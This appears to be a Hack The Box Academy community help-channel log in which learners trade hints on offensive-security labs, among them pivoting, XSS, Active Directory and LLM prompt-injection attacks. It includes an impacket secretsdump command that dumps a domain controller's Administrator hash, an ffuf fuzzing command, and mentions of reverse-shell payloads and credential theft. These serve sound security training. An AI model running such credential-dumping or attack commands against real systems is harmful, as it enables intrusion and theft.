I have done the pen testing modules on HTB Academy and have tried commands on PowerShell, but have gotten nowhere for this question :(. any advice and guidance would be appreciated if anyone has done this module
You may want to do the CPTS path in order, like it is supposed to be taken..
Oh, then you should be good and my previous recommendation still stands. Like I said, think easy stuff, i.e., cred harvesting, shares enum, roasting, etc.
oh ive just been doing the modules from fundamentals to hard
Has anybody completed intro to academy's purple modules?
Enroll in some path. They link each module in the sequence. It's easy to learn this way
any moderator or past CTF player can tell, in coming smacksmash-HTB CTF , will there be digital certificates of participation ????
Can anyone help me?
what for ??
hi
Web Attacks
Bypassing Security Filters
I'm stuck on this
Should I send the request with get
help me
Just be patient
I was in a hurry, sorry.
Was your question: "should I send as a GET request?"
If so: did you try?
As I understand the question: if I send it as "test", the POST request works, but if I use "test;" the POST does not work, it must be done via GET. But even if I send it as "test", it goes via GET, but I cannot use "test;"
Am I on the right path?
I dont recall verb tampering, just using the provided field
Actually nvm I just changed the request to get after
It didn't take much it just worked
😢 worked, thanks
Is it possible to do things on my own terminal instead of web based terminal?
All you need to know about the VPN Connection for Academy
Thats for machines but when I do the cpts roadmap
:D
Oh yeah another question: I'm at the Linux fundamentals lesson but when I read about a subject and go to the question, the question is way different from the things I have learned. Is that normal?
It's not as different as you think
Most of the questions will relate to the reading in some way, or a previous section of the module
ZAP hud is iffy sometimes, I never really used/needed it
yes ZAP HUD was such a big pain in the ass for me. For the skill assessment of this module, you don't need to touch zap once if you want
Okey understand
Gonna do my best to ask this question without spoiling content from the module
Pivoting, Tunneling, and Port Forwarding | Remote/Reverse Port Forwarding with SSH
Within the contents of the module, there's an example of how to build a reverse_https payload for a reverse shell. Within that syntax there's reference to a "backupscript.exe" is this exe just an executable with reverse shell code in there? Just trying to understand for notes sake - please @ with replies
this is an msfvenom payload
and the name "backupscript.exe" is just a random name for the payload
Sweet, I thought so, but I just wanted to make sure, thanks
MAKE IT MAKE SENSE!
rip @west iris
it is the spawn, i just poped out into the side to work side by side
ok i see. I am new to this and have had to take time off for an extended health crisis. like i said "make it make sense" and you made it make sense 🤣
Yo where to download a cyber-skills-benchmark-2025
Is anyone able to assist me with a question involving pivoting with the AD Enum skills assessment part 1.
I need someone to mentor me in hacking
What does this have to do with modules?
Academy will teach you
Well thats the only chat I have access, so I asked here
Cyber benchmark was the last biz ctf
ahh
What? On main site it says download, Where am I supposed to download it or buy or whatever
Idk if they've uploaded the challenges to the platform yet
just tell me where is that, on main site it is just a description and thats all
But we're veering off-topic still
You can search the writeups on the htb gh and find the challenge names off that
so in that book are only write ups?
No
I thought it was about some research etc
Look, this is getting off-topic, I suggest linking your account and at least asking in #general
I'm going through and doing some module labs that I need to get done so I can sit the CPTS and there is a particularly frustrating module "Password Attacks" Section: Network Services, now I know how to do all of this already keep that in mind, just checking boxes here so I can sit the exam.
But did anybody else have issues with the last flag for SMB? I have reset this damn box like 4 times, for sure have the proper creds (of which there are only 4 keep that in mind)
and the person who is supposed to have access to said share just flat out doesn't
its super annoying
the share is even named after this person
so I go and look at the "solution" in the writeup, confirmed its indeed what I am doing 1:1 and its saying indeed that should work and they should have access... they do not have access no matter what I do.
You all ran into this?
Naa I mean someone to show me around
No one's going to help with that without charging you or something. This field requires a lot of self learning.
I didn't have any issues with that one. If you want to DM what you have been trying, maybe I can help steer you towards other options to try.
I figured it out my dumb ass was misreading the pass by a single digit lmao
I feel dumb, it was on like my 5th reset where I was like dude wtf
I'm just tired :(
I have a question on Cross-Site Scripting (XSS) > Phishing > XSS Discovery > "Before you continue, try to find an XSS payload that successfully executes JavaScript code on the page."
It's obvious which parameter I should be testing. I tried XSStrike but I don't understand how to use the payloads it generated. I tried entering them in the image URL box but it doesn't seem to do anything.
I tried the payload that we learned to try when script tags don't seem to be allowed.
link the module page that you are for me, I did this one just need a reminder
Did you figure out the pw attack issue? I finished that module already, happy to help.
I did I was just being silly and tired, thank you though
I was legit missing the password by a single digit on that account when typing it out like a derp
only took me like 4-5 resets and me raging, but hey, we get there.
On windows lateral movement module skill assessment, I've got the WSUS user and pw but I'm unable to run a powershell prompt as admin to run the SharpWSUS.exe tool on WSUS. What am I missing here?
I've been stuck here for a while, can anyone provide a hint?
anyone for Introduction to Dynamic Analysis with WinDbg - Skills Assessment Q1? Do not see any relevant memory writes in userspace - not sure what to even look for
Are you still stuck here?
Sure am 😭
You can send me a DM and I'll see what I can do.
on it
@gray yacht are you available to be DM'd about a questions with the AD enum skills assessment part 1?
Are you unable to find answers to your questions by searching this channel?
correct
Sure you can DM.
The module : info gathering , skill assessment (web edition)
What is the API key in the hidden admin directory that you have discovered on the target system
For this fuzzing of subdomain or v host is required , yes or no ?
Can anyone provide some help for the LLM output attack skill assessment? It's been 5 days and I'm still stuck on it
Use AI if your English is not that great or make some friends on here that are French 😎
Ohhhh guardiannn
Hello all, I'm currently doing the Authentication bypass via parameter modification question under the broken auth module, and I used the following ffuf command to fuzz the correct user ID for admin, but nothing turned up:
ffuf -w tokens.txt -u "http://94.237.121.185:41461/admin.php?user_id=FUZZ" -b "PHPSESSID=38i5ccsqc5vjqdndasl2h6o2h4" -mr "Could not load admin data. Please check your privileges."
tokens.txt is till all 3-digit no.s
can someone tell what I am doing wrong?
Hey did you ever get that figured out?
Try to replicate the request on the last picture of module using curl (means only the URL), then just use ffuf to automate those curls
Can I DM to clarify about this? don't want to spoil this for others
Has anybody completed Intro to Academy's Purple Module?
ask your question maybe i could help
can I dm you?
ok
Hey me too. I am stuck on injection part. What's your issue?
Hey just curious if anyone has any advice or techniques with connection issues to the target box. These issues being session getting dropped prematurely or the web services being unresponsive. I'm currently working on the nibble initial foot hold and privilege escalation challenge however my reverse shell continues to be dropped and the admin login page will drop every so often and reloading the dashboard takes a few attempts and minutes to reload. I've tried gaining access from my local host, the pwnbox, and my VM with the same issues propagating across all of them. I've had my most success from the pwnbox however the sessions wont stay open long enough to complete enough commands to finish the lab.
yo guys sorry for being off topic but i can't access the general channel in this server. Is it because I haven't verified yet or what? If so, does anyone know where my identifier is
Well i dont know what we need to do. Like did we need an injection to get a admin_key?
...?
Try it and find out 
I did but was not able to find any thing I tried some 3,4 wordlists
Aight DM me
-# Unsolicited DMs will be sent rules... and meme
i used hashcat but it shows "no hashes loaded"
I'm kinda stuck with the password attacks module assessment. I managed to get Administrator on jump01 (winrm), but don't have a clue what to do next to go to DC01, any tips?
u putted hash in a file?
hey discord, quick question.
for this module Android Application Static Analysis, do i need an x64 computer? im on an m1 mac at the moment
yes
dm ss of terminal
dm the user u r on
okay after spamming commands as fast as possible i made it
I haven't done that module but I also have the m1 and always have problems when compiling tools and then running them on target hosts, so what i do is create a docker with the same architecture as the target. Not sure if you're in the same situation but maybe it helps
how is in the sliver module still crackmapexec being used ?
because it was written when CrackMapExec was still active
time for update 🙂
having trouble getting the pivoting part to work
because of older stuff, i think ill switch back to the htb vm, since older stuff is probably installed there.
Hello, can you please help me
I was able to get the DC01.pfx file but don't know how to proceed
when i try to use the gettgtpkinit.py to pass the certificate the command just hangs there until timeout
so can you please walk me through how did u solve it, i got the first flag using the second method but couldn't dump the administrator hash even if I had the klist set as the jpinkman, also why do we need the two ip addresses for?
both of those modules are incomplete. it was frustrating to officially finish them tbh lol.
😮
ill eventually have to if i want to go for CAPE
did u do with own box
or htb vm
coz i got to the assumed breach part on my own vm, but the pivoting part etc is too outdated to make it work on my own machine.
could you please elaborate
well u have to put extension.json in sliver
but its outdated so when u install it on your machine it doesnt wanna connect, since its a different version.
talking about the pivoting part in Chisel
i havent touched the CME one for a while, but i got stuck on an answer even after a lot of help. i cant remember exactly what it was. as for sliver, i knew exactly what i needed to finish the skills assessment but i could still never get through. i verified with others that i was doing the right thing, generating my beacons and implants correctly. they also had trouble. so maybe some skill issue but i've used CobaltStrike just fine.
I'd need to look at the modules again to identify properly what the issue is. i obviously moved onto other things for the moment lol.
always nxc. its the best lol
While doing the assessment from password attacks module, I tried to scan the internal network through proxychains but that didn't work, although scanning network hosts from internal host using dropped binary of nmap worked like a charm. Any idea why nmap wasn't working with proxychains?
cos nmap tries to ping but ICMP requests don't work through proxychains
I tried to use -Pn switch, but it didn't help
probably also some memory issues
Ohh, okey, thanks!
dm
cant seem to get eyewitness to work any help?
Hi guys am new here. Nice to meet you all. I want to learn ethical hacking but don’t no where to start.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Am I supposed to read something in the terminal to the left of the 200 status while using ffuf?
deleted your image bc spoilers
generally speaking, some wordlists have blank lines meaning that if you visit /some/endpoint and the endpoint is blank, it still returns positive
So it's normal that it comes out that way, right? It's just that I've run ffuf several times already and the directory isn't showing up anywhere, and I'm not getting any other errors
im doing the 3rd question here
could it be posible im using a small wordlist ?
the second question asks for the directories, and i do that on those directories and subsequent ones inside
yes but there's several subdomains per q1
and using the extension i found
there are multiple extensions
im doing in depth 1, need to go further?
ye
recursive
but my main point is that there's multiple subdomains
it's possible the one in your screenshot isn't the one you're looking for
i search in all the subdomains i answered in the question before
it takes forever hahaha
im doing -t 200 but having no errors, so im not missing anything right?
it could also be your wordlist
i used /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ and medium
could it be i need to pick the large ?
nope the word is in that list
im resetting the machine and trying again , dont know where the problem is ^_^Uu
Hey, does anyone have any contacts at Hack The Box or access to someone from their team? I need to speak to them directly regarding an urgent account issue. Please let me know if you can help
make sure your extension list has the . prefix i.e. .php,.html,.svg
You can contact support
Need to speak to a person? Learn how to reach our support via HTB Labs.
you'll have to contact support, discord isn't an official mode of platform support
yeah , im so stupid
forgot , web prefixes had in their list :/
for the answer make sure you put :PORT and not the actual port number in the answer
yeah i read that, thanks for the advice
what is this server even about
nopeee HTB supports guys never reply
see #welcome
you'll have to be patient; the only way to get help with your account is via support
ok thanks mate
anybody on the prompt injection attack skill assessment? HaWa corp website
I am too. Did you progress?
Working through Meterpreter Tunneling and Port Forwarding
First question - Can you transfer a payload via ssh? I was able to use a separate method for this answer, but transferring a payload won't work --> stuck for second question. Please @ with replies
Good afternoon
Anyone work on Intro to C2 Operations with Sliver Kerberos Delegation & Enumeration and get the s4u impersonation to work? Specifically Step 3:
Impersonate a privileged user and request a TGS ticket to access the CIFS service on the target computer. For example, the privileged user can be a local administrator of the target computer, sometimes we can even impersonate the domain admin. But the domain user could be configured as cannot be delegated. In our case, child\Administrator cannot be delegated, however, another domain admin user child\carrot can be delegated, so we impersonate carrot. The service name will not be verified, so even if the target service is eventsystem, we can modify it as the CIFS service.
I run the s4u just like it shows in the module but I don't get access to srv02 per my screen shots
I can't impersonate the carrot user for some reason. I have reverted the machine, reconnected my vpn, I did this yesterday and today after VM, vpn and reconnecting to everything and it still doesn't work.
Still doesn't work
hello guys in Pass the Certificate i have got the password for Administrator but i am not able to login any hint?
What are the contents of flag.txt on Administrator's desktop?
Not working unfortunately
Yeah works fine, can ssh in fine, but scp gets denied I guess?
lmfao
feel free to dm mate
Can anybody help me with AI red Team Insecure output handling section? I am stuck!! I am able to get the cookie for the first XSS assignment. I understand the 2nd assignment but getting stuck. a hint would be very welcome 🥹
Ran this directly on Web01 and the commands all work like they should however the impersonation doesn't work and I can't read the c$ drive on srv02.
This is not a server for illegal hacking - that isn't welcome here
lol
This is a server for learning ethical hacking, whereas what you're asking for is illegal.
<@&486603600085123073> for your visibility
Back to this though, I'm unsure how to complete the 2nd question in this module. I'm trying to only use meta / meterpreter because that's what this section is based on. I can't get the payload to transfer to the target host, unsure how to proceed from here
@digital dirge English only please
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
can i do ethical hacking from window
You will get a VM to use from HTB that you can utilize if you do not have a VM or something else capable
^
You should be able to use the creds that have been using to access the pivot host to remotely access it and move your payload.
Then just ssh into it and use wget or curl if they are installed.
so stand up http server from my host first, then just grab from my "server" first?
While I have someone's attention - any idea why I tried to do the autoroute with msf but it keeps failing to validate session? The autoroute module won't run because there's no sessions running - verified that the msf proxy server is running as well
Please refrain from sending a DM unless I've already said to DM me. Are you still stuck on this?
So you've executed your payload and established a meterpreter session?
No I was attempting to utilize the Scanning without ICMP -> SOCKS with Proxychains bit, but I could be missing something.. There was a lot of syntax in this module, just trying to wrap my head around all of it
I don't remember that part of the section. You're working on this section Meterpreter Tunneling & Port Forwarding?
Yeah
Now I'm trying to get the payload using the http server you were talking about, just not finding my file I guess?
Go ahead and send a DM, so I can see what it is that's going on.
Ok guys and hello. Having great trouble with loading SocksOverRdp
plugin
if someone did it
I need help with a project
how do I do the labs in the modules. I am new to this platform
If you are new to the platform, Intro to Academy module will help
I also have a question. Do you find it easier to complete the practical exercises in the pwnbox directly or do you have a kali vm where you complete all the exercises.
I use my own (Kali) vm
how do you accomplish this. I get that you have to download the vpn file and connect to it.
Follow these simple steps and connect to the VPN! Quick & Easy.
All you need to know about the VPN Connection for Academy
thank you!
Is anyone available for a little help on Cross-Site Scripting (XSS) > Phishing > Credential Stealing?
https://academy.hackthebox.com/module/103/section/984
I believe I have everything configured correctly but 'creds.txt' isn't being created. Also, I get 'Not Found' on the victim browser logging in. I do see the creds come across my PHP listener though.
Everything works fine if I use a netcat listener. I see the creds come across etc. I'm thinking it must have something to do with the php script?
hey all. Doing the sqlmap skills assessment, and am consistently getting slightly incorrect versions of the DB names. Trying to figure out why, wondering if anyone else has had this before. I have tried many different tamper and threads options, and still get incorrect DB names with 0 entries. I thought maybe it is due to latency with the timing attacks but would love a nudge in the right direction
Hello guys I'm new to you I want advice to start learning cyber security shops
No, my notes say: "nmap's proxy option isn't fully finished yet so not all functions or traffic may be routed through the proxy. We can just use proxychains instead."
Okay
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@limber schooner ^
Yes
Hello everyone, I am on Attacking Windows Credential Manager section. i have gotten the cmd as admin and backed up the credentials, can someone give a small hint on transferring mimikatz or lazagne out to it? i have tried scp and winscp, and cert util. Thank you in advance.
Yes i have got admin pass but not able to login or use it
Yes!
xfreerdp is decent it has the /drive:/directory/location,sharename
Well lets see what's going on.
Just give me 3 m while i run my pc
Hi,
I have a question for Kernel exploit in the windows Privesc for the CVE-2020-0668. In the example, they use the MozillaMaintenance service but it seems we don't have the permissions to start this service in the lab.
https://academy.hackthebox.com/module/67/section/627
I'm wondering, is it normal, should we find another service? In this case, which to choose without breaking our machine?
so for example that would be 'xfreerdp /c:/shared,mysharedfolder'?
no
it's literally an option labeled /drive:
the /directory/location,sharename can be swapped around too, so you can do /drive:linux,/tmp for
it gets mounted to a share \\tsclient\sharename in the above example \\tsclient\linux
Did you get it figured out? If not DM me
hello guys, someone compromised my original account and used it to spam so i got banned, but after i got control of the account i was wondering where i can get in touch with an admin to maybe help me get back in
@fathom pendant can you pls help out with this
og discord account?
i will send you a request with the account
any hint guys hosts file: 10.129.234.174 dc01.inlanefreight.local
impacket-secretsdump -k -no-pass -dc-ip 10.129.234.174 -just-dc-user Administrator 'inlanefreight.local/DC01$'@dc01.inlanefreight.local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Bind context rejected: invalid_checksum
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
i'm in a call rn but give me an hour or reach out to another mod
How easy is the new cert
don't know it literally just dropped
oh
just sent the request name is MONTERO_FRINCH
You can DM me
ty i will send you a request with my og account rn
just dm me
I think this is the first time I was able to self rescue! It looks like I was running the PHP listener from the wrong directory 🤣
I am stuck on LLM-Output Attack module's skill assessment. I have the admin's password hash but am unable to crack it with all types of wordlists that are typically used. I was able to recover the admin_key but that is also not opening up newer avenues. Am I missing something? Can someone please show me the way. Thanks.
ty @cloud urchin
I'm way more stuck than I thought I was on https://academy.hackthebox.com/module/103/section/984 🤣
I don't want to post spoilers, anyone available for a quick nudge in the right direction?
DM me if you're still stuck
do i need to purchase a VPS in the setting up section?
no
okay ty
What is the largest Wide Area Network (WAN) that connects millions of Local Area Networks (LANs) globally?
Isn't it "Internet"?
Yes it is
yeah
What type of message does a client send to accept an IP address from a DHCP server?
DHCP Request?
Alice's laptop receives this offer and sends back a DHCP Request message to accept the IP address.
why it doesn't accept answer 
brother just try some other stuff i got it first try looking at the page for just a couple seconds
look at the DORA process
OMG itS JUST REQUEST
Dora the explorer 
nah it's about a format of answers
it accepts "Request", but not "DHCP Request"
idk what the problem to care about users and add a couple of answers as valid, they are valid anyways
true
Does tier 2 and downward give you a good foundation and skillset to start doing pentesting? Or would i need to work on some tier 3s and tier 4s?
why is RDP so horrendous in academy
#1234357888114364508 if you want to suggest something
CPTS is at most t2; if that helps frame your understanding
anyone else having an issue when spawning a lab?
it takes forever saying Target(s) are spawning...
Try pressing CTRL+SHIFT+R then try again
it worked, thanks 
can someone guide me 😐
@analog carbon do not spoil. please read channel description at the top
sorry, how can I get help:|
just ask for the module name and section and or drop the url to where you need
Sometimes changing regions breaks/unbreaks it
Use the mask attack described in the reading
thank you solved ❤️
https://academy.hackthebox.com/module/290/section/3271 I need help on last 2 question of this
Im having trouble connecting to kali vm in Windows Attack & Defense module -> https://academy.hackthebox.com/module/176/section/1778
I keep getting request timed out messages can anyone help? I can connect to the bob user but not the kali one
iirc you have to connect to the kali machine from the bob user
sorry i probably wasnt clear, i was trying to connect to the kali from bob and it was RTO'ing
No. Either Ghidra or Ida free can be used.
Doing this: Linux Fundamentals, find files and directories (question 1) what is the name of the config file that has been created after 2020-03-03 and is smaller than 28kb but larger than 25k, the problem is when i do -exec ls -al {} ; in the find command, it simply says it cant find -exec
the -exec is part of the find command
right im using that yet it says /user/bin/find: missing argument to ‘-exec’
did you do \; to end the exec args?
it needs to be escaped, it's not a typo in the module
yes with 2>/dev/null
do you wanna see the full command
so it ends \; 2>/dev/null ?
also im doing it in powershell should i just switch back
you should probably be doing this in bash terminal
yes 2>/dev/null is the succeeding command
alright ill see the results
it worked!
Is there a way to set it for the storage to be below 28k with find?
-size +Ns and -size -Ns; N is the size, s is the storage value (b,k,g,t...)
+ is above, - is below
so +Nk is above N Kilobytes, -Nk is below N kilobytes
Two separate commands right?
yes the -size has to be set in their own separate parameters
-size +10k -size -15k <-- range between 10 and 15 KB
Thank you a lot
Aaand new problem, no files were found within that range
Nvm found the problem
user error?
I forgot to ssh into htb academy 😭😭
All that just to find out im missing ssh
Is there maybe a more effective way to count files 😅
-sU -sV not showing results?
No, and there is only the service name, and no version number after the service name
And it was also wrong for me to submit the answer using the service name
Try connecting via netcat
If all else fails: use pwnbox [turn off the vpn on your own machine]
I tried it with pwnbox and it worked. Thank you.
There's instructions in #welcome
Thanks
I've been stuck with the 2nd XSS of this module https://academy.hackthebox.com/module/307/section/3586
Can anybody nudge me in the right direction?
Cheers, I'd have a general question: If I finish a module while having an active subscription, do I still gain the reward-cubes for the completed modules? (you know, the small "+1 cube" thingies on some of the lab-questions)
yes
in-general the cube return is the # you get over the full module
that all add up to the 20%
Does anyone having problems in RDP into the WIndows Group Privileges labs?
I keep getting credentials wrong while i copy paste them into xfreerdp and rdesktop
Hi If i have gained a local admin account on a parent domain, can i authenticate with that account to a child domain?
that depends on the forest/trust relationship
if its bi-directional or transitory then yes
or unidirectional actually
so probably yes. but you can check those perms with something like PowerView
or if you got a bloodhound collect, hopefully it picked those up in its collect and if so, then you can view in BloodHound
another option may be to use your admin privs to gain more creds and then see if there is an account that is both on the parent domain and the child domain. dual homed accounts would be useful if you get dcsync
i dont think ive done that, but usually you'd get that in an nmap scan when you look at the banner
then try vsftpd -v
or --version
did that work?
i had a quick look, and it also looks like the linpill.sh they present in that module is a linPEAS light. it looks like it produces a bunch of .txt files with system info inside? so checking the output of that pillaging script should also help
While doing password attacks, I have no idea how to find the password using snaffler + powerhuntshares doesn't seem to be working despite basically copy-pasting the default command outlined in the material lol
guys i have a question. how can i dump a TDO ( trusted keys ) without using mimikatz? how can i do the same thing from linux? secretdump and lsassy are not able to dump that information
I've been drowsily doing the CPTS path. Up until the password attacks kind of meh.. But the skills assessment was pretty great. I actually learnt something, and it was fun to do. I wasn't convinced after the convoluted mess before that it could have a coherent skills assessment that covers the content well. I was wrong. Whoever built that lab, congrats, job well done!
you may need to double check, or just try it out, but possibly using ntdsutil to copy SYSTEM and SECURITY registry hives
or a shadowcredentials attack
particularly useful if you have backup operator writes so you have extended copying privileges
already done several times, and tried to dump ntds.dit offline too, still no way to get that info XD
basically i'm trying to run this module: https://academy.hackthebox.com/module/253/section/2810 without using rubeus and mimikatz
ahhh i havent done that one yet
what section is that?
i cant see unless i unlock
Active Directory Trust Attacks - trust account attack
ahhh ok. then i'd be looking at impacket
there were a few 'unofficial' scripts, like rbac and childparent
but without having a proper look at the module im just guessing. i havent done any 'proper' AD attacks for a few months and im feeling rusty. sorry mate lol
still need help?
i am getting netbios timeout in smb...i tried my own vm and htb pwnbox...i am not able to ping the box...dont know what is happening
I've been stuck with the 2nd XSS of this module https://academy.hackthebox.com/module/307/section/3586
Can anybody nudge me in the right direction?
cant ping coz it might be windows
theres a flag to increase netbios timeout use that
can u dm me
pls check dm
Hi there I'm new here but I need help if anyone is available
I've been stuck on the Active Directory Trust Attacks - Skills Assessment Question 2 for a while. I'm fairly sure I know the attack and searching this channel hints I was correct, but I cannot make it work and I cannot see why.
Have you enumerated a path?
it looks like i have but I'm happy to be told it's wrong since i've been unable to use it
From what I’ve seen lately, Bloodhound-CE won’t give you a straight up path.
If you’re like me and prefer old tools, Bloodhound legacy should give you a path to own apexcargo
BH CE shows me a path but if there's a more correct path in the legacy option I guess i can fire it up and try
It only shows the user and group, not what one of them can do. At least from what I’ve been told
I’ll always resort to Legacy as it’s more straightforward
Socat Redirection with a Reverse Shell
Module mentions using the windows/x64/meterpreter/reverse_https payload - host is in linux, and I didn't see a linux equivalent to this - am I missing something?
Can I skip the step of Windows in Setting Up module? Is this step unavoidable in the future?
I've just redone this lab using BH Legacy, I suspect your tip was for the first question. I can't see a better path for the second.
The second question is for owning apexcargo. If using Bloodhound legacy didn’t show you anything different, then, you’re probably running the wrong parameters in your attack.
You can DM if you’d like
Anyone has done the Password attack skills assessment I could DM ? I think I'm pretty close but I've been stuck for days
I can try
i dont understand dmz how can i solve password attacks skill assessment
should i do the pivoting module first
also, is scanning through proxychains supposed to be damn slow
htb please make it so that on complex modules, you can add more time to the box
i just came back from gym, and now have to do the whole exploit chain again. etc
while my beacon still works.
i have 32 mins remaining and cant add more time anymore to the machine.
You can add more time to the pwnbox when it reaches 30mins or lower iirc, and you can extend target time to a total of 360 mins
no you cant
if u already added time before
its on 29 mins now, and i cant increase it.
because i already allocated time before.
Hello, I have a question on this part, it shows incorrect password if I remove /netonly
Targets are a max of 360 min lifetime
yea i know
but i want it so that if you have to do something or whatever, and then it counts down from that time that its possible to increase the time.
that would be nice if its possible
/feedback
because now i have to do the entire attack chain etc again.
so i have to reset the machine, while its not even neccesary normally
i sent the feedback
ty
Hello, I have a question on the Active Directory Enumeration & Attacks - DCSync Q#2, I saw some advice here that the runas command should not have a /netonly however when I try that one, it does not work, basically it gives me a password error. I already reset the machine and tried the Start-Process command too but still not working. Is there a specific command that I can use?
Hello @novel matrix , I can't log in to HTB Academy account after trying many times, and I can't verify on Discord to chat without logging in
it says "We think you might be a bot..."
You'd have to reach out to support on the site no support is provided over Discord. Side note, if you're using a VPN try disconnecting.
Contacting via Email
If you are unable to reach the support chat, you can always contact support directly via email by emailing customerops@hackthebox.com.
Any help please?
Nvm. Got the answer
nvm silly question from me 🙂
Hey guys, regardless of which machine I'm working on, very often when I try to scan it with nmap, I receive the following result whether I use sudo or not.
For example, in the solutions section it says to use nmap -A some_ip and you will get information about the ports. In reality, this is what I get as a result:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-23 17:39 EEST
Nmap scan report for 10.129.22.169
Host is up (2.9s latency).
All 1000 scanned ports on 10.129.22.169 are in ignored states.
Not shown: 952 filtered tcp ports (no-response), 48 filtered tcp ports (host-unreach)
Impossible from my side to access my boxes since 15/20 min (not a problem from my side, my connection is good). the box crashed and despite rebooting nothing up. I even change the VPN location. Am I alone ?
Which module? Are you using the Pwnbox at the same time as the VPN?
I am in the module Introduction to Linux Privilege Escalation (path Environment Enumeration) and I have no idea how can I solve this exercise:
"Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer."
any suggestions please
Currently I am trying this begginer box
https://academy.hackthebox.com/module/112/section/1078
Using VM and i am connected to the VPN through OpenVPN
Personally for password assessment if you're lost just take all files sort them by dates and you will find some files
Oh that's a skill assessment about footprinting. Probably need to scan for more than just the top 1000 ports 😉
Thanks, let me remove the flag and against all ports
nmap -sC -sV 10.129.22.169
nmap -A target_ip returns me the correct result on the pwnbox, but on my vm
└─$ nmap -A 10.129.22.169
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-23 18:05 EEST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.21 seconds
To be honest, I've already lost hope of finding anything that even remotely resembles a flag. By the way, I can get root access, and that's pretty easy, but I just can't figure out what is meant by an 'interesting file'
The Pwnbox and VPN use the same IP, so you're going to run into network issues using both at the same time.
correct, i stopped the pwnbox and reset my vpn just in case and run the same nmap command
give me the module link, but it could be a lot of things (ssh keys, history file, credentials somewhere, configuration file, database, etc.)
I even terminate the box and start a new instance
.viminfo, i also had a lot of difficulties for this one, so I use this command now, it gives you the latest 50 files modified :
find /{bin,etc,home,lib,lib32,lib64,media,mnt,opt,root,sbin,snap,srv,tmp,usr,var} -type f -printf "%T@ %p\n" 2>/dev/null | grep -v -E "/var/log/*/*|/usr/lib|/var/lib|/etc/systemd/system|/snap/core2*|/snap/lxd|/snap/snapd|/var/cache" | sort -n | cut -d' ' -f 2- | tail -n 50 | xargs ls -lat
Strange, I'm analyzing the .viminfo file I found in the /root directory, but I don't see anything interesting in it...
deleted the VPN certificate and download it again seems to fix the issue
This is just madness, I'm on the verge of a breakdown
Not root other user
the windows VM in pivoting, tunneling and port forwarding goes unresponsive every time i download a file inside there
i have been doing this skills assessment for 10 hours because ive had to reset the box 30 times and try to switch VPN config, use the pwnbox, use virtualbox, try everything
and this has been going on for 2 days too
why do nmap shows drastically different results everytime it is ran for host discovery?
i tested it on my local network nmap -sn 192.168.1.0/24 for host discovery, it showed different results each time, it seemed very unreliable for host discovery.
so what am i missing here?
Doesn't sound module related as no modules use that ip range
can someone help a brother out and check if you have the same problem as I do?
it is a question related to https://academy.hackthebox.com/module/19/section/101
and of course the module doesn't use a local network, it uses a different network that i have no access over, so i used my local network for testing 🙂
You're not using the right IP.
Connect to the VPN or use the Pwnbox and you can scan the target it provides
you are correct, i was scanning the exact network they used which is not reachable 10.129.2.0/24.
i was supposed to scan the network i'm connected to via the VPN 10.10.15.0/24.
but still, why were the results inconsistent when i used it on my local network (real world scan scenario)?